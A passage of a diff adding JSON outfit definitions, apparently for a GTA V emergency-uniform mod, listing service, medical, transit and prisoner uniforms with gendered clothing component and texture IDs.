"384:1", +"UpperSkin": "241:1", +"Decal": "1:1", +"UnderCoat": "221:1", +"Pants": "143:1", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Public Worker Coveralls", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "61:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "67:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "40:3", +"Shoes": "28:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "92:2" + }, + { + }, + { +"Name": "Female Public Worker Coveralls", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "61:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "61:3", +"UpperSkin": "76:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "40:3", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "92:2" + }, + { +"Name": "Male PostOp Uniform", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:10", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "14:5", +"Shoes": "52:1", +"Accessories": "17:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female PostOp Uniform", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:10", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "53:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male PostOp Bermudas", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "46:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "13:9", +"Shoes": "13:13", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Post Up polo", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "33:1", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "53:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male GoPostal Uniform", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:9", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "14:6", +"Shoes": "52:1", +"Accessories": "17:2", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female GoPostal Uniform", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:9", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "100:2", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male GoPostal Bermudas", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "46:2", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "13:10", +"Shoes": "13:13", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female GoPostal polo", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "33:2", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "100:2", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LS Transit Bus Driver", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:11", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "14:9", +"Shoes": "52:1", +"Accessories": "17:2", +"Armor": "53:1", +"Parachute": "1:1" + }, + { +"Name": "Male LS Transit Operator", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:12", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "14:7", +"Shoes": "52:1", +"Accessories": "17:3", +"Armor": "53:1", +"Parachute": "1:1" + }, + { +"Name": "Male LS Transit Maintenance", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:13", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "155:1", +"Pants": "14:8", +"Shoes": "52:1", +"Accessories": "17:1", +"Armor": "53:1", +"Parachute": "49:1" + }, + { +"Name": "Male Airworker", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "1:8", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "4:1", +"Mask": "1:1", +"Top": "10:2", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "53:1", +"Pants": "11:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "54:1", +"Parachute": "1:1" + }, + { +"Name": "Female LS Transit Bus Driver", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:11", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "53:2", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "53:1", +"Parachute": "1:1" + }, + { +"Name": "Female LS Transit Operator", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:12", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "53:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "53:1", +"Parachute": "1:1" + }, + { +"Name": "Female LS Transit Maintenance", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:13", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "192:1", +"Pants": "53:3", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "53:1", +"Parachute": "1:1" + }, + { +"Name": "Male Blaine Medical Examiner", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "308:20", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "24:1", +"Pants": "5:10", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "30:24" + }, + { +"Name": "Female Blaine Medical Examiner", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "295:21", +"UpperSkin": "105:1", +"Decal": "1:1", +"UnderCoat": "60:3", +"Pants": "6:4", +"Shoes": "11:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "30:24" + }, + { +"Name": "Male Los Santos Medical Examiner", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "308:21", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "179:1", +"Pants": "11:5", +"Shoes": "52:1", +"Accessories": "39:7", +"Armor": "1:1", +"Parachute": "29:25" + }, + { +"Name": "Female Los Santos Medical Examiner", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "295:20", +"UpperSkin": "105:1", +"Decal": "1:1", +"UnderCoat": "48:7", +"Pants": "53:3", +"Shoes": "14:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "30:25" + }, + { +"Name": "Male Coroner Class B Shirt", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "76:9", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Coroner Class C Shirt", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "75:9", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Coroner Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:9", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female Coroner Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:9", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male Biohazard Kit", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "58:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "176:1", +"Top": "68:4", +"UpperSkin": "89:2", +"Decal": "1:1", +"UnderCoat": "63:4", +"Pants": "41:4", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male PPE Kit", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "68:1", +"UpperSkin": "89:1", +"Decal": "1:1", +"UnderCoat": "62:1", +"Pants": "41:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Biohazard Kit", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "58:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "176:1", +"Top": "62:4", +"UpperSkin": "102:2", +"Decal": "1:1", +"UnderCoat": "44:4", +"Pants": "41:4", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female PPE Kit", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "62:1", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "41:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male Patient", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "105:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "30:1", +"Shoes": "35:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Patient", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "96:1", +"UpperSkin": "9:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "18:1", +"Shoes": "36:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Prisoner", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "33:1", +"UpperSkin": "1:1", +"Decal": "26:1", +"UnderCoat": "16:1", +"Pants": "46:5", +"Shoes": "43:2", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Prisoner", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "32:1", +"UpperSkin": "15:1", +"Decal": "25:1", +"UnderCoat": "15:1", +"Pants": "48:5", +"Shoes": "99:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" +}, +} \ No newline at end of file